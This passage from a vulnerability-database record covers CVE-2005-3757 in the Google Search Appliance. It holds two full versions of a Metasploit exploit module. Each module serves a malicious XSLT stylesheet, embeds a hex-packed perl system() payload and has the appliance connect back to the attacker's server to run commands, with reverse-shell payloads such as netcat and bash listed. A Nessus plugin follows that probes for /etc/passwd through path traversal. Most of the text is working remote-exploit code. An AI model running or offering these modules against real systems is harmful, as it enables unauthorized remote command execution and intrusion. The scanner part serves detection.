http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Remote::HttpServer\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Google Appliance ProxyStyleSheet Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a feature in the Saxon XSLT parser used by\r\n\t\t\tthe Google Search Appliance. This feature allows for arbitrary\r\n\t\t\tjava methods to be called. Google released a patch and advisory to\r\n\t\t\ttheir client base in August of 2005 (GA-2005-08-m). 
The target appliance\r\n\t\t\tmust be able to connect back to your machine for this exploit to work.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9653 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2005-3757'],\r\n\t\t\t\t\t['OSVDB', '20981'],\r\n\t\t\t\t\t['BID', '15509'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 4000,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl bash telnet netcat-e',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix',\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DisclosureDate' => 'Aug 16 2005',\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Aggressive,\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\t# Handle incoming requests from the appliance\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tprint_status(\"Handling new incoming HTTP request...\")\r\n\r\n\t\texec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack(\"H*\")[0] + '}))'\r\n\t\tdata = @xml_data.gsub(/:x:MSF:x:/, exec_str)\r\n\t\tsend_response(cli, data)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => '/search',\r\n\t\t\t'vars_get' =>\r\n\t\t\t{\r\n\t\t\t\t'client' => rand_text_alpha(rand(15)+1),\r\n\t\t\t\t'site' => rand_text_alpha(rand(15)+1),\r\n\t\t\t\t'output' => 'xml_no_dtd',\r\n\t\t\t\t'q' => rand_text_alpha(rand(15)+1),\r\n\t\t\t\t'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'\r\n\t\t\t}\r\n\t\t}, 10)\r\n\r\n\t\tif (res and res.body =~ /cannot be resolved to an ip address/)\r\n\t\t\tprint_status(\"This system appears to be vulnerable\")\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\tif (res and res.body =~ /ERROR: Unable to fetch the 
stylesheet/)\r\n\t\t\tprint_status(\"This system appears to be patched\")\r\n\t\tend\r\n\r\n\t\tprint_status(\"This system is not exploitable\")\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\r\n\t\t# load the xml data\r\n\t\tpath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"google_proxystylesheet.xml\")\r\n\t\tfd = File.open(path, \"rb\")\r\n\t\t@xml_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tprint_status(\"Obtaining the appliance site and client IDs...\")\r\n\t\t# Send a HTTP/1.0 request to learn the site configuration\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => '/',\r\n\t\t\t'version' => '1.0'\r\n\t\t}, 10)\r\n\r\n\t\tif !(res and res['location'] and res['location'] =~ /site=/)\r\n\t\t\tprint_status(\"Could not read the location header: #{res.code} #{res.message}\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tm = res['location'].match(/site=([^\\&]+)\\&.*client=([^\\&]+)\\&/im)\r\n\t\tif !(m and m[1] and m[2])\r\n\t\t\tprint_status(\"Invalid location header: #{res['location']}\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status(\"Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...\")\r\n\t\tstart_service\r\n\r\n\t\tprint_status(\"Requesting a search using our custom XSLT...\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => '/search',\r\n\t\t\t'vars_get' =>\r\n\t\t\t{\r\n\t\t\t\t'client' => m[2],\r\n\t\t\t\t'site' => m[1],\r\n\t\t\t\t'output' => 'xml_no_dtd',\r\n\t\t\t\t'q' => rand_text_alpha(rand(15)+1),\r\n\t\t\t\t'proxystylesheet' => \"http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml\",\r\n\t\t\t\t'proxyreload' => '1'\r\n\t\t\t}\r\n\t\t}, 25)\r\n\r\n\t\tif (res)\r\n\t\t\tprint_status(\"The server returned: #{res.code} #{res.message}\")\r\n\t\t\tprint_status(\"Waiting on the payload to execute...\")\r\n\t\t\tselect(nil,nil,nil,20)\r\n\t\telse\r\n\t\t\tprint_status(\"No response from the 
server\")\r\n\t\tend\r\n\r\n\t\tprint_status(\"Shutting down the web service...\")\r\n\t\tstop_service\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16907/"}], "metasploit": [{"lastseen": "2020-06-23T22:22:35", "description": "This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance must be able to connect back to your machine for this exploit to work.\n", "published": "2007-03-12T01:08:18", "type": "metasploit", "title": "Google Appliance ProxyStyleSheet Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3757"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/UNIX/WEBAPP/GOOGLE_PROXYSTYLESHEET_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Appliance ProxyStyleSheet Command Execution',\n 'Description' => %q{\n This module exploits a feature in the Saxon XSLT parser used by\n the Google Search Appliance. This feature allows for arbitrary\n java methods to be called. Google released a patch and advisory to\n their client base in August of 2005 (GA-2005-08-m). 
The target appliance\n must be able to connect back to your machine for this exploit to work.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2005-3757'],\n ['OSVDB', '20981'],\n ['BID', '15509'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 4000,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic perl bash-tcp telnet netcat netcat-e',\n }\n },\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Targets' => [[ 'Automatic', { }]],\n 'DisclosureDate' => 'Aug 16 2005',\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultTarget' => 0))\n end\n\n # Handle incoming requests from the appliance\n def on_request_uri(cli, request)\n\n print_status(\"Handling new incoming HTTP request...\")\n\n exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack(\"H*\")[0] + '}))'\n data = @xml_data.gsub(/:x:MSF:x:/, exec_str)\n send_response(cli, data)\n end\n\n def autofilter\n true\n end\n\n def check\n res = send_request_cgi({\n 'uri' => '/search',\n 'vars_get' =>\n {\n 'client' => rand_text_alpha(rand(15)+1),\n 'site' => rand_text_alpha(rand(15)+1),\n 'output' => 'xml_no_dtd',\n 'q' => rand_text_alpha(rand(15)+1),\n 'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'\n }\n }, 10)\n\n if (res and res.body =~ /cannot be resolved to an ip address/)\n vprint_status(\"This system appears to be vulnerable\")\n return Exploit::CheckCode::Appears\n end\n\n if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)\n vprint_status(\"This system appears to be patched\")\n end\n\n return Exploit::CheckCode::Safe\n end\n\n\n def exploit\n\n # load the xml data\n path = File.join(Msf::Config.data_directory, \"exploits\", \"google_proxystylesheet.xml\")\n fd = File.open(path, \"rb\")\n @xml_data = fd.read(fd.stat.size)\n fd.close\n\n print_status(\"Obtaining the appliance site and client IDs...\")\n # Send a HTTP/1.0 request to learn the 
site configuration\n res = send_request_raw({\n 'uri' => '/',\n 'version' => '1.0'\n }, 10)\n\n if !(res and res['location'] and res['location'] =~ /site=/)\n print_status(\"Could not read the location header: #{res.code} #{res.message}\")\n return\n end\n\n m = res['location'].match(/site=([^\\&]+)\\&.*client=([^\\&]+)\\&/im)\n if !(m and m[1] and m[2])\n print_status(\"Invalid location header: #{res['location']}\")\n return\n end\n\n print_status(\"Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...\")\n start_service\n\n print_status(\"Requesting a search using our custom XSLT...\")\n res = send_request_cgi({\n 'uri' => '/search',\n 'vars_get' =>\n {\n 'client' => m[2],\n 'site' => m[1],\n 'output' => 'xml_no_dtd',\n 'q' => rand_text_alpha(rand(15)+1),\n 'proxystylesheet' => \"http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml\",\n 'proxyreload' => '1'\n }\n }, 25)\n\n if (res)\n print_status(\"The server returned: #{res.code} #{res.message}\")\n print_status(\"Waiting on the payload to execute...\")\n select(nil,nil,nil,20)\n else\n print_status(\"No response from the server\")\n end\n\n print_status(\"Shutting down the web service...\")\n stop_service\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/google_proxystylesheet_exec.rb"}], "nessus": [{"lastseen": "2021-01-20T11:31:42", "description": "The remote Google Search Appliance / Mini Search Appliance fails to\nsanitize user-supplied input to the 'proxystylesheet' parameter, which\nis used for customization of the search interface. 
Exploitation of this\nissue may lead to arbitrary code execution (as an unprivileged user),\nport scanning, file discovery, and cross-site scripting.", "edition": 27, "published": "2005-11-22T00:00:00", "title": "Google Search Appliance proxystylesheet Parameter Multiple Remote Vulnerabilities (XSS, Code Exec, ID)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3757", "CVE-2005-3758", "CVE-2005-3756", "CVE-2005-3754", "CVE-2005-3755"], "modified": "2005-11-22T00:00:00", "cpe": ["cpe:/h:google:mini_search_appliance", "cpe:/h:google:search_appliance"], "id": "GOOGLE_SEARCH_APPLIANCE_PROXYSTYLESHEET.NASL", "href": "https://www.tenable.com/plugins/nessus/20241", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20241);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2005-3754\", \n \"CVE-2005-3755\", \n \"CVE-2005-3756\", \n \"CVE-2005-3757\", \n \"CVE-2005-3758\"\n );\n script_bugtraq_id(15509);\n\n script_name(english:\"Google Search Appliance proxystylesheet Parameter Multiple Remote Vulnerabilities (XSS, Code Exec, ID)\");\n script_summary(english:\"Checks for proxystylesheet parameter multiple vulnerabilities in Google Search Appliance\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple flaws.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Google Search Appliance / Mini Search Appliance fails to\nsanitize user-supplied input to the 'proxystylesheet' parameter, which\nis used for customization of the search interface. 
Exploitation of this\nissue may lead to arbitrary code execution (as an unprivileged user),\nport scanning, file discovery, and cross-site scripting.\");\n # http://web.archive.org/web/20051213084327/http://metasploit.com/research/vulns/google_proxystylesheet/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?516540e6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2005/Nov/652\");\n script_set_attribute(attribute:\"solution\", value:\"Contact Google for a fix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Appliance ProxyStyleSheet Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/h:google:search_appliance\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/h:google:mini_search_appliance\");\n script_end_attributes();\n \n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n \n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"google_search_appliance_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n 
script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!get_kb_item(string(\"www/\", port, \"/google_search_appliance\"))) exit(0);\n\n\nfile = \"../../../../../../../../../../etc/passwd\";\nw = http_send_recv3(method:\"GET\",\n item:string(\n \"/search?\",\n \"site=nessus&\",\n \"output=xml_no_dtd&\",\n \"q=\", SCRIPT_NAME, \"&\",\n \"proxystylesheet=\", file\n ), \n port:port\n);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\n# There's a problem if the error message indicates...\nif (\n # the file doesn't exist or...\n string(\"ERROR: Unable to fetch the stylesheet from source: \", file) >< res ||\n # the file does exist but isn't a valid stylesheet.\n \"The following required pattern was not found:\" >< res\n) {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}